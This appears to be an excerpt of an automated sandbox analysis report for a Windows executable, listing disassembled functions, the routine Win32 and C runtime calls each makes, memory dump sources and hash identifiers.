                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                                  • Opcode ID: e12d2d86149498a570dfe3d1f0cf3b012249e952dafe061ca34eaf36a442b0e2
                                                                                                                                                  • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                                                                                                  • Opcode Fuzzy Hash: e12d2d86149498a570dfe3d1f0cf3b012249e952dafe061ca34eaf36a442b0e2
                                                                                                                                                  • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                                                                                                  Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                  • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                                                                                  • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                                                                                                  • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                                                                                  • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                                                                                                  Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                                                                                                  • __itow.LIBCMT ref: 0045936A
                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                                                                                                  • __itow.LIBCMT ref: 004593A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                                  • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                                                                                  • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                                                                                                  • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                                                                                  • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                                                                                                  Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                                                                                                  • BeginPath.GDI32(?), ref: 00401373
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                                  • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                                                                                  • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                                                                                                  • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                                                                                  • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                                                                                                  Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                                                                                  • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3824534824-0
                                                                                                                                                  • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                  • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                                                                                  • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                  • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                                                                                  Function 00AB18DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,?,00AB15D8,00AB3CBB,?,00AB1D2A,?,?,00000000), ref: 00AB18E4
                                                                                                                                                  • _free.LIBCMT ref: 00AB1919
                                                                                                                                                  • _free.LIBCMT ref: 00AB1940
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00AB1D2A,?,?,00000000), ref: 00AB194D
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00AB1D2A,?,?,00000000), ref: 00AB1956
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                  • Opcode ID: bf34aa51ceded9156f041f0ad6d4ea0e8459ea396818d369f7725d0c84e5ea0e
                                                                                                                                                  • Instruction ID: 7cda99b2a0121abb051a14306539733df6a02655ea83380e5cf4a9ed58d4e1a1
                                                                                                                                                  • Opcode Fuzzy Hash: bf34aa51ceded9156f041f0ad6d4ea0e8459ea396818d369f7725d0c84e5ea0e
                                                                                                                                                  • Instruction Fuzzy Hash: C501F9362006417B9311B7B46DA9FEB266DABC6378BA10126F515E2263FE668D024251
                                                                                                                                                  Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                                                                                  • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                                  • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                  • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                                                                                  • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                  • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                                                                                  Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                                  • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                  • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                                                                                  • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                  • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                                                                                  Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                  • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                  • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                                                                                  • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                  • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                                                                                  Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                  • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                                                                                  • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                                                                                                  • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                                                                                  • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                                                                                                  Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                  • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                                                                                  • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                                                                                                  • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                                                                                  • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                                                                                                  Function 00AB3171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 00AB3189
                                                                                                                                                    • Part of subcall function 00AB2096: HeapFree.KERNEL32(00000000,00000000,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?), ref: 00AB20AC
                                                                                                                                                    • Part of subcall function 00AB2096: GetLastError.KERNEL32(?,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?,?), ref: 00AB20BE
                                                                                                                                                  • _free.LIBCMT ref: 00AB319B
                                                                                                                                                  • _free.LIBCMT ref: 00AB31AD
                                                                                                                                                  • _free.LIBCMT ref: 00AB31BF
                                                                                                                                                  • _free.LIBCMT ref: 00AB31D1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: 1097fbbec1119318b976ae8b855cf4c9deeaa5ddb6e685c1f670b19e87225fe9
                                                                                                                                                  • Instruction ID: c0a8000227e917bbc91cce10a5c6586a7d925efac013450260594b8d54daaed2
                                                                                                                                                  • Opcode Fuzzy Hash: 1097fbbec1119318b976ae8b855cf4c9deeaa5ddb6e685c1f670b19e87225fe9
                                                                                                                                                  • Instruction Fuzzy Hash: 69F01273545200AB8E34EBBCF985E9A77DDBA04711B54090AF55AD7603CB30FD818B64
                                                                                                                                                  Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EndPath.GDI32(?), ref: 004013BF
                                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                                                                                  • DeleteObject.GDI32 ref: 00401401
                                                                                                                                                  • StrokePath.GDI32(?), ref: 0040141C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
